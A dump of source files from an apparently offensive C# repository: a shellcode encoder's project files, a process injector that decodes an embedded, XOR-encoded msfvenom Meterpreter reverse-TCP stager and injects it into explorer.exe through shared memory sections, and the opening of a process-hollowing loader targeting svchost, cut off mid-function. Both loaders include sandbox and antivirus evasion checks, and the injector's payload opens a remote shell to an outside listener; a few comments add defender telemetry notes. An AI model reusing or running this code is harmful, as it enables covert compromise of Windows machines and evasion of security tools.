10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ROT Shellcode Encoder")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59224c16-39c5-49ea-8525-f493dc1d66fe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {59224C16-39C5-49EA-8525-F493DC1D66FE}
8 | Exe
9 | ROT_Shellcode_Encoder
10 | ROT Shellcode Encoder
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/ROT Shellcode Encoder/ROT Shellcode Encoder.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ROT Shellcode Encoder", "ROT Shellcode Encoder.csproj", "{59224C16-39C5-49EA-8525-F493DC1D66FE}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {F6755004-5FA9-4677-BBB7-D8446DC21ED4}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 |
6 | namespace RemoteShinjectLowlevel
7 | {
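/// <summary>
/// Injects an XOR-encoded shellcode blob into a remote process through a shared memory section:
/// NtCreateSection (RWX section) -> NtMapViewOfSection twice (RW view locally, RX view in the target)
/// -> write the decoded bytes through the local view -> CreateRemoteThread on the remote view.
/// Only the section object is RWX; neither mapped view is writable and executable at once.
/// Note that creating a thread in another process is exactly what Sysmon event 8 records.
/// </summary>
class Program
{
    // FOR DEBUGGING
    [DllImport("kernel32.dll")]
    static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);

    /// <summary>Length-and-content comparison of two byte arrays (managed; no msvcrt import needed).</summary>
    static bool ByteArrayCompare(byte[] b1, byte[] b2)
    {
        return b1.Length == b2.Length && b1.SequenceEqual(b2);
    }
    // END DEBUGGING

    public const uint ProcessAllFlags = 0x001F0FFF;   // PROCESS_ALL_ACCESS; kept for compatibility, no longer requested
    public const uint GenericAll = 0x10000000;
    public const uint PageReadWrite = 0x04;
    public const uint PageReadExecute = 0x20;
    public const uint PageReadWriteExecute = 0x40;
    public const uint SecCommit = 0x08000000;

    // Least-privilege handle for this technique: NtMapViewOfSection needs PROCESS_VM_OPERATION, the debug
    // read-back needs PROCESS_VM_READ, and CreateRemoteThread needs CREATE_THREAD | QUERY_INFORMATION |
    // VM_OPERATION | VM_WRITE | VM_READ. PROCESS_ALL_ACCESS handles are a common EDR/Sysmon-10 filter.
    public const uint ProcessInjectAccess =
        0x0002 /* PROCESS_CREATE_THREAD */ |
        0x0008 /* PROCESS_VM_OPERATION */ |
        0x0010 /* PROCESS_VM_READ */ |
        0x0020 /* PROCESS_VM_WRITE */ |
        0x0400 /* PROCESS_QUERY_INFORMATION */;

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // MaximumSize is a PLARGE_INTEGER (8 bytes). Marshalling it as 'ref uint' hands the kernel a 4-byte slot
    // and lets it read 4 bytes of adjacent stack as the upper half of the size, so use a full 64-bit value.
    [DllImport("ntdll.dll", SetLastError = true)]
    static extern uint NtCreateSection(ref IntPtr SectionHandle, uint DesiredAccess, IntPtr ObjectAttributes, ref long MaximumSize,
        uint SectionPageProtection, uint AllocationAttributes, IntPtr FileHandle);

    // SectionOffset is PLARGE_INTEGER and ViewSize is PSIZE_T (in/out, pointer-sized): 'out uint' for ViewSize
    // gives the kernel a 4-byte slot to write 8 bytes into on x64, hence 'ref IntPtr'.
    [DllImport("ntdll.dll", SetLastError = true)]
    static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize,
        ref long SectionOffset, ref IntPtr ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect);

    [DllImport("ntdll.dll", SetLastError = true)]
    static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

    [DllImport("ntdll.dll", ExactSpelling = true, SetLastError = false)]
    static extern int NtClose(IntPtr hObject);

    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

    [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

    [System.Runtime.InteropServices.DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();

    /// <summary>
    /// XORs every byte of <paramref name="data"/> with <paramref name="key"/> in place.
    /// XOR is its own inverse, so the same call encodes and decodes.
    /// </summary>
    /// <param name="data">Buffer to transform; may be empty.</param>
    /// <param name="key">Single-byte key.</param>
    /// <exception cref="ArgumentNullException">If <paramref name="data"/> is null.</exception>
    public static void XorInPlace(byte[] data, byte key)
    {
        if (data == null)
        {
            throw new ArgumentNullException(nameof(data));
        }
        for (int i = 0; i < data.Length; i++)
        {
            data[i] = (byte)(data[i] ^ key);
        }
    }

    /// <summary>
    /// Entry point. Runs a sandbox check, decodes the embedded stager and injects it into the first
    /// process named <c>explorer</c>. Every native call is checked and the section/handles are released
    /// on all paths; the remote view is deliberately left mapped because the new thread runs from it.
    /// </summary>
    static void Main(string[] args)
    {
        // Sandbox evasion: several emulators do not implement VirtualAllocExNuma and return NULL.
        // IntPtr is a struct and is never 'null', so the original '== null' test could not fire; compare with Zero.
        IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
        if (mem == IntPtr.Zero)
        {
            return;
        }

        // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
        // XORed with key 0xfa
        byte[] buf = new byte[511] {
        0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
        0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
        0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
        0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
        0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
        0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
        0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
        0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
        0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
        0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
        0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
        0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
        0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
        0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
        0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
        0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
        0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
        0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
        0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
        0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
        0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
        0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
        0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
        0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
        0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
        0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
        0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
        0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
        0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
        0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
        0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
        0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
        0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
        0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
        0x2f
        };

        int len = buf.Length;

        // Get a handle on the local process
        IntPtr lHandle = Process.GetCurrentProcess().Handle;
        Console.WriteLine($"Got handle {lHandle} on local process.");

        // Grab the right PID. First() would throw InvalidOperationException when the process is absent.
        string targetedProc = "explorer"; //change :)
        Process[] candidates = Process.GetProcessesByName(targetedProc);
        if (candidates.Length == 0)
        {
            Console.WriteLine($"No process named '{targetedProc}' found. Aborting.");
            return;
        }
        int procId = candidates[0].Id;

        // Get a handle on the remote process with only the rights the technique needs
        IntPtr pHandle = OpenProcess(ProcessInjectAccess, false, procId);
        if (pHandle == IntPtr.Zero)
        {
            Console.WriteLine($"OpenProcess on PID {procId} failed (Win32 error {Marshal.GetLastWin32Error()}). Aborting.");
            return;
        }
        Console.WriteLine($"Got handle {pHandle} on PID {procId} ({targetedProc}).");

        // Create a RWX memory section with the size of the payload using 'NtCreateSection'
        IntPtr sHandle = IntPtr.Zero;
        long maxSize = len;
        uint cStatus = NtCreateSection(ref sHandle, GenericAll, IntPtr.Zero, ref maxSize, PageReadWriteExecute, SecCommit, IntPtr.Zero);
        Console.WriteLine($"Created new shared memory section with handle {sHandle}. Success: {cStatus == 0}.");
        if (cStatus != 0)
        {
            CloseHandle(pHandle);
            return;
        }

        IntPtr baseAddrL = IntPtr.Zero;
        try
        {
            // Map a view of the created section (sHandle) for the LOCAL process, writable only
            IntPtr viewSizeL = new IntPtr(len);
            long sectionOffsetL = 0;
            uint mStatusL = NtMapViewOfSection(sHandle, lHandle, ref baseAddrL, IntPtr.Zero, IntPtr.Zero, ref sectionOffsetL, ref viewSizeL, 2, 0, PageReadWrite);
            Console.WriteLine($"Mapped local memory section with base address {baseAddrL} (viewsize: {viewSizeL}, offset: {sectionOffsetL}). Success: {mStatusL == 0}.");
            if (mStatusL != 0)
            {
                return;
            }

            // Map a view of the same section for the REMOTE process (pHandle), executable only
            IntPtr baseAddrR = IntPtr.Zero;
            IntPtr viewSizeR = new IntPtr(len);
            long sectionOffsetR = 0;
            uint mStatusR = NtMapViewOfSection(sHandle, pHandle, ref baseAddrR, IntPtr.Zero, IntPtr.Zero, ref sectionOffsetR, ref viewSizeR, 2, 0, PageReadExecute);
            Console.WriteLine($"Mapped remote memory section with base address {baseAddrR} (viewsize: {viewSizeR}, offset: {sectionOffsetR}). Success: {mStatusR == 0}.");
            if (mStatusR != 0)
            {
                return;
            }

            // Decode shellcode as late as possible so the plaintext stager spends minimal time in memory
            XorInPlace(buf, 0xfa);

            // Copy shellcode to locally mapped view, which will be reflected in the remote mapping
            Marshal.Copy(buf, 0, baseAddrL, len);
            Console.WriteLine($"Copied shellcode to locally mapped memory at address {baseAddrL}.");

            // DEBUG: Read memory at remote address and verify it's the same as the intended shellcode
            byte[] remoteMemory = new byte[len];
            IntPtr noBytesRead;
            bool readOk = ReadProcessMemory(pHandle, baseAddrR, remoteMemory, remoteMemory.Length, out noBytesRead);
            Console.WriteLine($"DEBUG: Checking if shellcode is correctly placed remotely...");
            if (!readOk || !ByteArrayCompare(buf, remoteMemory))
            {
                Console.WriteLine("DEBUG: NOT THE SAME! ABORTING EXECUTION.");
                return;
            }
            Console.WriteLine("DEBUG: OK.");
            // END DEBUG

            // Execute the remotely mapped memory using 'CreateRemoteThread' (EWWW high-level APIs!!!)
            IntPtr hThread = CreateRemoteThread(pHandle, IntPtr.Zero, 0, baseAddrR, IntPtr.Zero, 0, IntPtr.Zero);
            if (hThread != IntPtr.Zero)
            {
                Console.WriteLine("Injection done! Check your listener!");
                CloseHandle(hThread);   // the thread keeps running; we only drop our handle to it
            }
            else
            {
                Console.WriteLine("Injection failed!");
            }
        }
        finally
        {
            // Unmap the locally mapped section view using 'NtUnmapViewOfSection' (the remote view stays: the thread runs from it)
            if (baseAddrL != IntPtr.Zero)
            {
                uint uStatusL = NtUnmapViewOfSection(lHandle, baseAddrL);
                Console.WriteLine($"Unmapped local memory section. Success: {uStatusL == 0}.");
            }

            // Close the section and the process handle
            int clStatus = NtClose(sHandle);
            Console.WriteLine($"Closed memory section. Success: {clStatus == 0}.");
            CloseHandle(pHandle);
        }
    }
}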
186 | }
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Sections Shellcode Process Injector")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Sections Shellcode Process Injector")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("08dbc2bf-e9f3-4ae4-b0cc-6e9c8767982d")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}
8 | Exe
9 | Sections_Shellcode_Process_Injector
10 | Sections Shellcode Process Injector
11 | v4.7.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x64\Debug\
38 | DEBUG;TRACE
39 | full
40 | x64
41 | 7.3
42 | prompt
43 | true
44 |
45 |
46 | bin\x64\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x64
51 | 7.3
52 | prompt
53 | true
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30804.86
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sections Shellcode Process Injector", "Sections Shellcode Process Injector.csproj", "{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x64 = Debug|x64
12 | Release|Any CPU = Release|Any CPU
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.ActiveCfg = Debug|x64
19 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.Build.0 = Debug|x64
20 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.ActiveCfg = Release|x64
23 | {08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.Build.0 = Release|x64
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {48768DED-4F3D-43B9-8D5A-3771A7C4278E}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace ProcessHollowing
5 | {
6 | public class Program
7 | {
// dwCreationFlags value for CreateProcess: the new process starts with its primary thread suspended,
// so (presumably, per the class name) the image can be swapped out before any of its own code runs.
public const uint CREATE_SUSPENDED = 0x4;
// ProcessInformationClass value for ZwQueryInformationProcess (ProcessBasicInformation); the call
// then fills a ProcessBasicInfo, which is how the target's PEB address is obtained.
public const int PROCESSBASICINFORMATION = 0;
10 |
// Managed mirror of the Win32 PROCESS_INFORMATION structure that CreateProcess (imported below) fills in:
// handles to the new process and its primary thread plus their IDs. Both handles are owned by the caller.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
public struct ProcessInfo
{
    public IntPtr hProcess;   // handle to the created process (used for Read/WriteProcessMemory and ZwQueryInformationProcess)
    public IntPtr hThread;    // handle to its primary thread (the one ResumeThread would release)
    public Int32 ProcessId;
    public Int32 ThreadId;
}
19 |
// Managed mirror of the Win32 STARTUPINFO structure passed to CreateProcess. Field order and widths must
// match the native layout exactly; cb has to be set to the struct size before the call.
// NOTE(review): CharSet.Auto marshals lpReserved/lpDesktop/lpTitle as Unicode on NT, while the CreateProcess
// import below is CharSet.Ansi (CreateProcessA). That is harmless while those strings stay null - confirm in Main.
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
public struct StartupInfo
{
    public uint cb;              // size of this structure in bytes
    public string lpReserved;
    public string lpDesktop;
    public string lpTitle;
    public uint dwX;
    public uint dwY;
    public uint dwXSize;
    public uint dwYSize;
    public uint dwXCountChars;
    public uint dwYCountChars;
    public uint dwFillAttribute;
    public uint dwFlags;         // STARTF_* bits saying which of the fields above are meaningful
    public short wShowWindow;    // WORD in the native struct; 16 bits either way
    public short cbReserved2;    // WORD in the native struct; 16 bits either way
    public IntPtr lpReserved2;
    public IntPtr hStdInput;
    public IntPtr hStdOutput;
    public IntPtr hStdError;
}
42 |
// Managed mirror of PROCESS_BASIC_INFORMATION as returned by ZwQueryInformationProcess with
// PROCESSBASICINFORMATION. Only PebAddress and UniquePid are named; the other fields are pointer-sized
// placeholders that keep the offsets right (six pointer-sized slots, which is the native size on x64).
[StructLayout(LayoutKind.Sequential)]
internal struct ProcessBasicInfo
{
    public IntPtr Reserved1;
    public IntPtr PebAddress;     // base address of the target's PEB; its image-base field is what hollowing reads
    public IntPtr Reserved2;
    public IntPtr Reserved3;
    public IntPtr UniquePid;
    public IntPtr MoreReserved;
}
53 |
// kernel32!Sleep. Used by Main as a crude sandbox check: sleep, then verify that wall-clock time really advanced.
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
56 |
// kernel32!CreateProcessA (CharSet.Ansi picks the A variant, so string arguments are marshalled as ANSI).
// Called with CREATE_SUSPENDED so the host process exists but has not executed anything yet.
// SetLastError = true makes Marshal.GetLastWin32Error() meaningful when it returns false.
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes,
    IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
    [In] ref StartupInfo lpStartupInfo, out ProcessInfo lpProcessInformation);
61 |
// ntdll!ZwQueryInformationProcess (undocumented export; same as NtQueryInformationProcess from user mode).
// With procInformationClass = PROCESSBASICINFORMATION it fills procInformation with a PROCESS_BASIC_INFORMATION;
// ProcInfoLen must be that struct's size and retlen receives the number of bytes written. Returns an NTSTATUS (0 = success).
[DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass,
    ref ProcessBasicInfo procInformation, uint ProcInfoLen, ref uint retlen);
65 |
// kernel32!ReadProcessMemory: copies dwSize bytes from lpBaseAddress in the target into lpBuffer.
// Needs PROCESS_VM_READ on hProcess; lpNumberOfbytesRW receives the byte count actually read.
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer,
    int dwSize, out IntPtr lpNumberOfbytesRW);
69 |
// kernel32!WriteProcessMemory — Main uses it to overwrite the child's entry point with the
// decoded payload. Defender note: a parent writing into the memory of a child it created
// moments earlier (still suspended) is observable via Sysmon Event ID 10 (ProcessAccess
// with write rights) and the Microsoft-Windows-Threat-Intelligence ETW provider.
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
72 |
// kernel32!ResumeThread. Returns the thread's previous suspend count ((uint)-1 on failure);
// Main treats a return of 1 as success because the thread was created suspended exactly once.
[DllImport("kernel32.dll", SetLastError = true)]
static extern uint ResumeThread(IntPtr hThread);
75 |
// Entry point. After a wall-clock sleep check, hollows a freshly created svchost.exe:
// 1) CreateProcess with CREATE_SUSPENDED, 2) obtain the child's PEB and image base via
// ZwQueryInformationProcess + ReadProcessMemory, 3) parse the PE headers to find the
// entry point, 4) overwrite the entry point with the XOR-decoded payload, 5) ResumeThread.
// Defender notes: the observable sequence is a suspended child, a parent reading and
// writing that child's memory immediately after creation, then ResumeThread. Sysmon
// Event ID 10 (ProcessAccess with VM_WRITE rights on the new child) and ETW
// Microsoft-Windows-Threat-Intelligence events are the usual telemetry for this.
// No API result is acted upon: each is only echoed to the console and execution
// continues regardless. The 8-byte/Int64 reads and PEB/PE offsets assume a 64-bit
// process targeting a 64-bit child.
public static void Main(string[] args)
{
    // AV evasion: Sleep for 10s and detect if time really passed
    // (exit if less than 9.5 s of wall-clock time elapsed around the Sleep call)
    DateTime t1 = DateTime.Now;
    Sleep(10000);
    double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
    if (deltaT < 9.5)
    {
        return;
    }

    // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
